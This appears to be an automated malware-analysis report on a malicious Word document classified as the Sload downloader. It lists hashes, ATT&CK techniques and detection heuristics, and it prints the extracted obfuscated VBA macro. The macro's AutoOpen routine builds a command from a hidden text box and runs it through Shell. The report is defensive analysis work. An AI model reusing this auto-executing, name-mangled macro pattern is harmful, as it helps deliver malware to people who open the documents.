Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c216a2a1e9f88f88…

MALICIOUS

Office (OLE)

86.2 KB Created: 2018-12-17 19:03:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: deeb2f151b86973173797ce0e0b46d78 SHA-1: da0864c86f35f60736950398d07d000a7212ac9f SHA-256: c216a2a1e9f88f8889125d88d1875b1bb333d73a5f3df9f63d238c5396594d06
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call is used to execute PowerShell, indicating an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6787805-0' further supports this downloader behavior.

Heuristics 10

  • ClamAV: Doc.Downloader.Sload-6787805-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6787805-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          NGQJiLQjtGvrhOzZwkcp = 237184342 - nquztsMMwiVjvNQTvGjlVfo
    KztczVC = Array(pFzIi, spiJN, QANzX, Interaction.Shell(uQpNYiJjb, oqHlvSmZU), rXaKMb)
       juFXhmbJjtwuIWs = TKwGOqYAPsBvPVKPcPHpAN * Rnd(178945110 / Sin(FfjovhRjXAiaUNusVE)) / Wfd + Int(47943052 - Rnd(270584453 - Tan(239117126) * 211354698 - Cos(LihSsOCmFiZAiGkEibSYOmk)) / 309211900 * Sin(96159215 / Tan(141389556) / 95832597 / Hex(129900811))) + 311001563 + CStr(43313828) - 250703011 / CLng(257277220) * 168399542 - Fix(239888722 - Hex(162682785) * 38007934 / ChrW(PYUUOdrvMLmlAYNRH / 210281657))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    mjhOCwI
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9725 bytes
SHA-256: 3fe12842e22fedfa720913539c7c28af01fc0d676f30f066faf29beff65844ec
Detection
ClamAV: No threats found
Obfuscation or payload: likely
131 of 168 identifiers look randomly generated (e.g. 'jamwhhowGdoqjGoEQjwjZUNf') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vVtcGjdj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
mjhOCwI
End Sub

Attribute VB_Name = "ElLATdz"
Function mjhOCwI()
On Error Resume Next
   hmhzzHzHUBjzAiCKDpnwYZH = ovMXupiSCzFuPIfu * Rnd(144073087 / Sin(jhzVXhIXzbZMWHfWLDvaMfXR)) / Wfd + Int(328547360 - Rnd(6287689 - Tan(167375852) * 54124807 - Cos(vJtcbqZNTYiOXpCtpcwPtwb)) / 336455421 * Sin(310925591 / Tan(237388599) / 29975333 / Hex(68068029))) + 212569910 + CStr(153767115) - 147336825 / CLng(55284238) * 2839169 - Fix(188774188 - Hex(30895912) * 119800554 / ChrW(juRFJrfQMppUXIYbtBwi / 307155017))
      rlPjwCWNulkNFijJjFwii = 308511323 - pIPwjHaGkkCCjqcvd
   QDOZEraZkjwKuQKj = WNwKUZUwDiKRBEzZqC * Rnd(22900160 / Sin(tksZlUSNzrGwdfCpJzviudA)) / Wfd + Int(58203262 - Rnd(103675116 - Tan(53175878) * 228623432 - Cos(wlDOHpZlVWYAHGwLcMn)) / 148274253 * Sin(13268002 / Tan(65641889) / 106510950 / Hex(287063948))) + 41053549 + CStr(164907048) - 341813305 / CLng(108811115) * 238067573 - Fix(236142102 - Hex(66346534) * 196988211 / ChrW(qOLnrroFQUmavXoipjDUM / 171175740))
      VMIhpIBlMuOQrnXkVzQlpd = 114587644 - BLmvDGJZQZqbjJzz
   GfuVuWVcStoIUlPacahzKYq = OQiisMFjsloiBINBTBIhKYQs * Rnd(40227701 / Sin(jamwhhowGdoqjGoEQjwjZUNf)) / Wfd + Int(199563649 - Rnd(61088394 - Tan(105956451) * 64987759 - Cos(qzqYsjiwvDHtEBjNcRCsGI)) / 216658505 * Sin(314205902 / Tan(169722302) / 170866430 / Hex(78731520))) + 90772778 + CStr(45285892) - 119514530 / CLng(158738237) * 115123358 - Fix(203927182 - Hex(63188815) * 104661583 / ChrW(zRqZKHUfpmVSdSBrNRji / 124818117))
      zSUQpdfpPvlFPLbciwnAGnE = 299017740 - oQjDNdhLDSXFtRqAzXZjY
Const oqHlvSmZU = 0
   FNdXYAuYfSwFoZjTsbEQKNip = WGUBXzsBsvFiLmCRMz * Rnd(96487638 / Sin(hiqitXSiqlsinBBtaX)) / Wfd + Int(52265628 - Rnd(135845076 - Tan(28003158) * 26817975 - Cos(daljpCwzOQWosQmHzfOKHDXu)) / 63437264 * Sin(243124762 / Tan(56115921) / 288470793 / Hex(272131987))) + 283810527 + CStr(302984916) - 102657819 / CLng(191159478) * 225421095 - Fix(81896350 - Hex(51035147) * 54876609 / ChrW(dbsniSRMJdnPIoqtoaDrXEu / 44652422))
      XWGLKEizICmSTZE = 192624241 - bfEZjFZjtmERTYhliHwKBzYI
   NWHcipzNNuBwRj = jOUPmiTWWRAzmtsbQTzuuWkh * Rnd(315693956 / Sin(DEkuobiLaQsArTtzlKds)) / Wfd + Int(73466187 - Rnd(130880093 - Tan(138372697) * 126020291 - Cos(iSmBMdnTJiOlcdZPaSciP)) / 183739144 * Sin(207884227 / Tan(2372949) / 304736350 / Hex(249689753))) + 175502733 + CStr(24002507) - 23601785 / CLng(119361053) * 234858253 - Fix(235072420 - Hex(116113482) * 62096453 / ChrW(JwKOmFhhofOIjEdk / 9938820))
      kVDmlHaCjPruiTTTPTQDqdi = 302696976 - VjdtzahirjoGWKCojVRqtAu
   chlzwZCHWwnnJhzGbn = QasrCUSJKcUVcZRm * Rnd(21689637 / Sin(FLFrPcWIvkCELOCuis)) / Wfd + Int(231813295 - Rnd(276764390 - Tan(232319125) * 187975477 - Cos(QsiCaLNrvtlVcEYLQUuZ)) / 224160201 * Sin(47384126 / Tan(41922716) / 112357616 / Hex(39346699))) + 125698641 + CStr(218140796) - 279364044 / CLng(163055783) * 19807792 - Fix(87267602 - Hex(252538106) * 190599817 / ChrW(pzkavwhsGKZsaqKhSVpD / 320138276))
      lNwHiXTsjwsvPYa = 276968871 - zrpAwrNsqfrkszZkjNX
   kchhMHJzwBGivzWFzwp = baZvcwNdPRPlXfX * Rnd(266288880 / Sin(PHifhOOHCtZirbzmkz)) / Wfd + Int(65273367 - Rnd(17983549 - Tan(245862422) * 32160041 - Cos(tfjilUKQbijjoLcuM)) / 68640737 * Sin(267946152 / Tan(172275408) / 31022241 / Hex(266230966))) + 337167070 + CStr(158322787) - 277800385 / CLng(119791230) * 337329054 - Fix(259045503 - Hex(209258431) * 90803928 / ChrW(kKtkzzjdmrczwHrJbIEzs / 320258624))
      KEjLoTVXlOwzZuacwchC = 227938870 - qCQwIXfaQtnfjjTlvJR
   jnihBmkmnXGvjCFKFkikTwi = QriBDiCpEhNqlmjX * Rnd(207776549 / Sin(vUQmSPjfqDKjXjF)) / Wfd + Int(132422976 - Rnd(110986468 - Tan(64870732) * 53186463 - Cos(jFUQrCpPZTEKELBNudZPR)) / 154990214 * Sin(290612491 / Tan(333871207) / 204680353 / Hex(136767723))) + 67823801 + CStr(194224433) - 245756627 / CLng(115733992) * 142657735 - Fix(149810141 - Hex(101961499) * 317845160 / ChrW(qAzvPaUGXzAiLirZnks / 114984367))
      NVlWsLdHzhvImKMu = 228778510 - ozRVzfqwutrimWiM
   oWuzNZaLWQrEPIOwLcVO = SGpbOEOaOuniNGIFIsAdm * Rnd(269489282 / Sin(BbEWjkZVXkuVQE)) / Wfd + Int(157867197 - Rnd(339243554 - Tan(137278996) * 77813981 - Cos(HVDVBBGrCjUkvdDozJihq)) / 268681070 * Sin(162250653 / Tan(107168881) / 327013524 / Hex(129138650))) + 246008806 + CStr(286813573) - 6533343 / CLng(242223674) * 297456609 - Fix(211631518 - Hex(119551612) * 13930326 / ChrW(hzFCVatXmDzwrNQYpmiuS / 321107932))
      YiPPqRqoStwVquHNHwRmMw = 137846326 - ikMDtnIOkKhUFLDFvPjFvra
   YKjVzfmurGjjoqnvwZojFVj = sqfmciFKOHwiBqB * Rnd(288128232 / Sin(XrBTIYMSFRJwOmCdbcHzARM)) / Wfd + Int(6476875 - Rnd(162339966 - Tan(112416982) * 215447093 - Cos(FuFXwmidfojSTTXNwOAVtFZ)) / 88643680 * Sin(305251463 / Tan(288414104) / 305396789 / Hex(39743865))) + 204045120 + CStr(5059855) - 305929214 / CLng(288683508) * 285148369 - Fix(120317201 - Hex(88255069) * 72047619 / ChrW(lAbDYznspjjtzEKQ / 73651560))
      zVsdErcziusaBG = 82051037 - KNZRVImUFLNMfw
   uRvRbDpTcIzXzvW = ZOaVKuFfYVvLicPwl * Rnd(216953007 / Sin(RYDpHXHHwJLcCipvm)) / Wfd + Int(296333806 - Rnd(288197006 - Tan(311211565) * 340304317 - Cos(QsFHikztBmQfFtWZ)) / 128059929 * Sin(327121153 / Tan(24580088) / 256927744 / Hex(46614767))) + 141993773 + CStr(84416827) - 299284451 / CLng(297384342) * 217665379 - Fix(294930902 - Hex(220596338) * 190585278 / ChrW(tlQFIKjztWIFIZ / 77080693))
      YwZNZurMEufLOzrSQw = 293176269 - PzkLpUEhiBMnhVIwIPdz
uQpNYiJjb = vVtcGjdj.TextBox1.Text + VYXif + YXOqwZ + EUusWGj + aUZWOMi + ifKlaGS + kPOvYd + KRlIIs + toiNcwpj + GiKWjrwq + tVDkjG
   AzTthZBoTUblDPkXcXvIcYi = hYpnUzhdaLYuvotiDLRHdzN * Rnd(286343147 / Sin(QSnBORcQZMIkNTWnwKsqqcn)) / Wfd + Int(199869327 - Rnd(83919331 - Tan(30115924) * 114393874 - Cos(bQhLzuEitbLtwdW)) / 185404756 * Sin(245327335 / Tan(332106819) / 277657825 / Hex(285991785))) + 314185826 + CStr(130937112) - 203170926 / CLng(266159104) * 136047482 - Fix(3840584 - Hex(21009746) * 265538652 / ChrW(JoJAWpIiwmTPrtXzwuMF / 76317888))
      OOZKHmtrzrPzknCtaoOzoLX = 181695960 - aHpVFqiTQavaLh
   SvTFawjrVSoICRLricVY = iBqZXtVibAQtniDiRYwZU * Rnd(145812108 / Sin(IiHPQaqSHYzjtdfC)) / Wfd + Int(19498799 - Rnd(67897136 - Tan(58159686) * 298770473 - Cos(XOPiHINDXzPMohvQd)) / 32939337 * Sin(51681857 / Tan(244066260) / 222642217 / Hex(60736573))) + 141992751 + CStr(275789529) - 333356675 / CLng(67041041) * 36002095 - Fix(249181363 - Hex(146655504) * 313302450 / ChrW(LcvkPshIRdPkZiXEv / 238759452))
      ZFAIkOtZkzDbhbjDjtzfYw = 316411445 - HSZwHbFKBkWKKULWWSzLOB
   sNErAMRVTIHvlwYQEKWUD = nvjIpmkwcoqzSqjnZbICW * Rnd(245061276 / Sin(jpkdwoAHRfGZIHrWf)) / Wfd + Int(248300235 - Rnd(151087753 - Tan(206767101) * 125218002 - Cos(oihkRlvMBPCjDTF)) / 61330886 * Sin(259504583 / Tan(52271142) / 183477217 / Hex(214471522))) + 160008477 + CStr(120181867) - 74648153 / CLng(114471116) * 152499578 - Fix(209402224 - Hex(223185466) * 35818747 / ChrW(RzFwbBFvMXPMFirXcEYR / 142918161))
      PDmhWTQMlDpijPwjbRzNakMU = 122765290 - TuubJoHSkCJuimfzmMWWuc
   iarzKtUbDRhPuNHLSdjWKX = DzpnJDKZCszdPSs * Rnd(208177444 / Sin(RSdwBlmzikDFiLfK)) / Wfd + Int(113333761 - Rnd(264344705 - Tan(326771885) * 133508019 - Cos(LYtrfXwkstZzTFs)) / 306007493 * Sin(82201051 / Tan(8264858) / 97166847 / Hex(23414663))) + 265255468 + CStr(200486126) - 122668049 / CLng(45025519) * 127877211 - Fix(132557551 - Hex(214825072) * 117973023 / ChrW(wivLGFtkEWNpOmrdIO / 42553770))
      PEmiQRjGmYLqiRtOimMzwK = 50862550 - AOZrbdLFaiDtrMuoYnzj
   OpVcbQzmEDPTAzu = YRwpEWCSSKLqrRad * Rnd(221877484 / Sin(jinZWUihwabbKp)) / Wfd + Int(222944109 - Rnd(230920611 - Tan(122977597) * 252276434 - Cos(wDrnCJQEHvmcmlzN)) / 79794982 * Sin(160676001 / Tan(329943432) / 314180399 / Hex(194912814))) + 70250016 + CStr(150068809) - 176778294 / CLng(184831806) * 285746405 - Fix(285792750 - Hex(2779474) * 146854116 / ChrW(HwoQjzsvkQFPXlJ / 323722870))
      pKbVKUqjnjQLKSQiwnnoWC = 15376261 - QnhqNmkRiCBpvmziwj
   rhjzaTLoWqlFRw = UfvWuPGLEGiobI * Rnd(273792684 / Sin(rKGAiAZUIBdBCf)) / Wfd + Int(207754434 - Rnd(1112193 - Tan(299442190) * 19217538 - Cos(rIEKllWfrsijjjntvLzXUGb)) / 96582806 * Sin(298357589 / Tan(249911647) / 31454168 / Hex(59116008))) + 163817761 + CStr(175702284) - 227756936 / CLng(312809480) * 162107062 - Fix(105689622 - Hex(326582490) * 304794514 / ChrW(zUPIUhcdRwUOlkowfXlhqQ / 338156999))
      NGQJiLQjtGvrhOzZwkcp = 237184342 - nquztsMMwiVjvNQTvGjlVfo
KztczVC = Array(pFzIi, spiJN, QANzX, Interaction.Shell(uQpNYiJjb, oqHlvSmZU), rXaKMb)
   juFXhmbJjtwuIWs = TKwGOqYAPsBvPVKPcPHpAN * Rnd(178945110 / Sin(FfjovhRjXAiaUNusVE)) / Wfd + Int(47943052 - Rnd(270584453 - Tan(239117126) * 211354698 - Cos(LihSsOCmFiZAiGkEibSYOmk)) / 309211900 * Sin(96159215 / Tan(141389556) / 95832597 / Hex(129900811))) + 311001563 + CStr(43313828) - 250703011 / CLng(257277220) * 168399542 - Fix(239888722 - Hex(162682785) * 38007934 / ChrW(PYUUOdrvMLmlAYNRH / 210281657))
      zmDXAjrwwlbwhiqTCzD = 5067410 - tzBKcivhYVREAIbM
   zaqBXIOWtrEtzLWmKEbuZs = scJvAJzVrRsiEqdVNZhG * Rnd(168345043 / Sin(niMhLzKatOGvzYNNNNtWMc)) / Wfd + Int(30468959 - Rnd(215941458 - Tan(115876474) * 316531364 - Cos(jOVrmFGpbiTwzKQXiXJsE)) / 52274585 * Sin(342097872 / Tan(78395443) / 135562079 / Hex(82396348))) + 20977198 + CStr(171917538) - 71986324 / CLng(193540655) * 210386919 - Fix(103733477 - Hex(99851992) * 123529254 / ChrW(MYWUprjmiuPtLvEaJHD / 187611001))
      OJXaCjiwCDjjjDzHDUA = 141178452 - VRFSriGCWHLqzwOztm
End Function